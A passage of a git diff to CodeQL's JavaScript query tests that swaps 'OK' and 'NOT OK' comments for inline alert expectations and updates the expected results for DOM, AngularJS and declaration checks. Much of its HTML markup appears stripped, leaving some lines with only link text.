function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected index 5b5f5ffa00c0..bd93c005dec1 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected @@ -1,5 +1,5 @@ -| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | -| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | -| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | +| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | +| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref index f746d68ee039..0d148711d808 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref @@ -1 +1,2 @@ -AngularJS/UseNgSrc.ql +query: AngularJS/UseNgSrc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..943b7d1ccd7d 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html @@ -4,13 +4,12 @@ - - Help + Help - - + + - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
- - Help + Help
diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref b/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref index b9796d5fe875..514a8413531d 100644 --- a/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref +++ b/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref @@ -1 +1 @@ -Comments/CommentedOutCode.ql +query: Comments/CommentedOutCode.ql diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref b/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref index 1a8a4a57b6d4..3fad05c4f256 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref +++ b/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref @@ -1 +1 @@ -Comments/TodoComments.ql +query: Comments/TodoComments.ql diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref b/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref index a7f743a3788e..cd82a95525cc 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref +++ b/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref @@ -1 +1,2 @@ -DOM/Alert.ql +query: DOM/Alert.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected index c013ea098297..bee7199e45f8 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected @@ -1,3 +1,3 @@ | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element | | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element | -| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element | +| tst.js:16:22:16:33 | id="theDiff" | This element has the same id as $@. | tst.js:16:46:16:57 | id="theDiff" | another element | diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html index 98a490ec408a..3cd7b57ed393 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html @@ -1,7 +1,7 @@ diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref index 7dfdfdde152a..a0e49e6dd91c 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref @@ -1 +1,2 @@ -DOM/AmbiguousIdAttribute.ql +query: DOM/AmbiguousIdAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html index bb5969c1f79e..9b0f0a8eb7ee 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html @@ -5,8 +5,8 @@
  • Second element
  • Templated id
  • Templated id
    • -
  • Invalid id
    • -
  • Invalid id
    • +
  • Invalid id
    • +
  • Invalid id
  • duplicate-class
  • duplicate-class
    • diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html index 2d5e014268c0..d96d9a670756 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html @@ -1,4 +1,4 @@ diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected index 46ff575e355c..4b9243036e4f 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected @@ -1,3 +1,3 @@ | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute | -| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute | -| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute | +| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute | +| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute | diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html index 92af95c3e3c1..9c1d31c1427d 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html @@ -1 +1 @@ -Semmle +Semmle diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref index 7022b813c939..678090c3e81b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref @@ -1 +1,2 @@ -DOM/ConflictingAttributes.ql +query: DOM/ConflictingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected index 988c4925a461..02866a675677 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected @@ -1,3 +1,3 @@ | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later | -| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later | -| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later | +| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later | +| tst.js:18:17:18:28 | id="theDiff" | This attribute $@. | tst.js:18:30:18:41 | id="theDiff" | is duplicated later | diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html index 4155ef623419..95a34ce55fd1 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html @@ -1,3 +1,3 @@ -Semmle +Semmle diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref index 1ce0181329f1..9066faa039ff 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref @@ -1 +1,2 @@ -DOM/DuplicateAttributes.ql +query: DOM/DuplicateAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected index 96d365e5dc5e..fbbfcc95d23b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected @@ -1,5 +1,5 @@ | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. | -| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. | -| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. | +| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. | +| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. | diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html index 9da8fcde5022..45d14ac5bb70 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html @@ -1 +1 @@ -
    An important heading
    +
    An important heading
    diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref index 8665e0ad7b85..04f910af31b9 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref @@ -1 +1,2 @@ -DOM/MalformedIdAttribute.ql +query: DOM/MalformedIdAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..04f9ee0bd554 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,18 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
    ; var div2 =
    ; -// not OK -Semmle; +Semmle; // $ Alert[js/conflicting-html-attribute] -// not OK -Semmle; +Semmle; // $ Alert[js/duplicate-html-attribute] -// not OK -
    ; -
    ; +
    ; // $ Alert[js/malformed-html-id] +
    ; // $ Alert[js/malformed-html-id] -// not OK -Semmle; +Semmle; // $ Alert[js/conflicting-html-attribute] -// OK
    ; -// not OK -var div3 =
    ; +var div3 =
    ; // $ Alert[js/duplicate-html-id] -// not OK -var div4 =
    ; +var div4 =
    ; // $ Alert[js/duplicate-html-attribute] diff --git a/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref b/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref index 4d773c9c35d7..51a532f97916 100644 --- a/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref +++ b/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref @@ -1 +1,2 @@ -DOM/PseudoEval.ql \ No newline at end of file +query: DOM/PseudoEval.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js b/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js index 52030b2e2584..18f3828a15e2 100644 --- a/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js +++ b/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js @@ -1,10 +1,10 @@ -window.setTimeout(";"); -setInterval("update();"); +window.setTimeout(";"); // $ Alert +setInterval("update();"); // $ Alert setInterval(update); -document.write("alert('Hi!');"); -window.execScript("debugger;"); +document.write("alert('Hi!');"); // $ Alert +window.execScript("debugger;"); // $ Alert (function(global) { var document = global.document; - document.write("undefined = 2"); + document.write("undefined = 2"); // $ Alert })(this); diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected index 1fba6292f897..d9842e5c53c0 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected @@ -1,9 +1,9 @@ | tst.html:23:1:23:61 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. | +| tst.html:25:1:25:54 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | -| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. | +| tst.js:16:1:16:43 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:17:1:17:58 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:18:1:18:51 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:29:12:29:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | +| tst.js:36:12:36:20 | $("") | External links without noopener/noreferrer are a potential security risk. | diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref index d02f1866b82d..3f4f724c916c 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref @@ -1 +1,2 @@ -DOM/TargetBlank.ql +query: DOM/TargetBlank.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html index 78c104bcaa1e..53d0df2000d9 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html @@ -20,14 +20,14 @@

    OK, because of constant prefix

    Example

    NOT OK, because of dynamic URL

    -Example -Example - +Example +Example + Example

    NOT OK: mailto is not fine.

    -mail somone +mail somone

    OK: template elements after # or ? are fine.

    Example diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..7f3f7c9fc537 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,6 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK Example; Example; Example; @@ -9,42 +8,37 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; -Example; -Example; +Example; // $ Alert - because of dynamic URL +Example; // $ Alert +Example; // $ Alert function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +46,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref index e48959a692ac..b955dfe9e83b 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref @@ -1 +1,2 @@ -Declarations/ArgumentsRedefined.ql +query: Declarations/ArgumentsRedefined.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js index c381f60bc272..1aceac8eeb0d 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js @@ -1,13 +1,13 @@ function f() { if (arguments[0].isArray()) - arguments = arguments[0]; // NOT OK + arguments = arguments[0]; // $ Alert } function g(x, y) { - var arguments = [y, x]; // NOT OK + var arguments = [y, x]; // $ Alert } (function (){ - for ([arguments] of o); - for ([arguments = 4] of o); + for ([arguments] of o); // $ Alert + for ([arguments = 4] of o); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts index d69f8eca109b..855c23cdb118 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts @@ -1,3 +1,3 @@ -declare function ambientArguments(arguments: string[]): string; // OK +declare function ambientArguments(arguments: string[]): string; -declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK +declare function ambientArgumentsVarArgs(...arguments: string[]): string; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected index b74841153cb3..7e457d64b08e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected @@ -1,7 +1,7 @@ -| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | -| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | -| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared | +| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | +| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | +| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared | diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref index a9c879e52c68..0003a1f3c6f5 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref @@ -1 +1,2 @@ -Declarations/AssignmentToConst.ql \ No newline at end of file +query: Declarations/AssignmentToConst.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js index 93bb382719f5..5a8866778884 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -class C {} +class C {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js index 5f022c603b78..3997e1366e7f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js @@ -1,4 +1,4 @@ -// OK: `const` is block scoped in ECMAScript 2015 +// OK - `const` is block scoped in ECMAScript 2015 function f() { { const val = 1; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js index e23c770f2ad1..130f0278d657 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -function C() {} +function C() {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js index 929a95754f81..5f66a500f8b5 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js @@ -1,2 +1 @@ -// OK -const s = "there"; \ No newline at end of file +const s = "there"; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js index c68d2380e017..fc40d5d3650c 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js @@ -1,26 +1,22 @@ const x = 23, y = 42; -// NOT OK -x = 42; +x = 42; // $ Alert -// NOT OK -y = 23; +y = 23; // $ Alert -// NOT OK -var y = -1; +var y = -1; // $ Alert -// NOT OK -++x; +++x; // $ Alert var z = 56; -// OK + z = 72; -// OK + const s = "hi"; (function (){ const c = null; - for ([ c ] of o); + for ([ c ] of o); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref index 09f107b9c2de..f93499b1f13e 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref @@ -1 +1,2 @@ -Declarations/ClobberingVarInit.ql \ No newline at end of file +query: Declarations/ClobberingVarInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js index 00ca7e51f7cf..c1060f0280ab 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js @@ -1,12 +1,11 @@ for (var iter in Iterator(aExtraHeaders)) { - // NOT OK - var 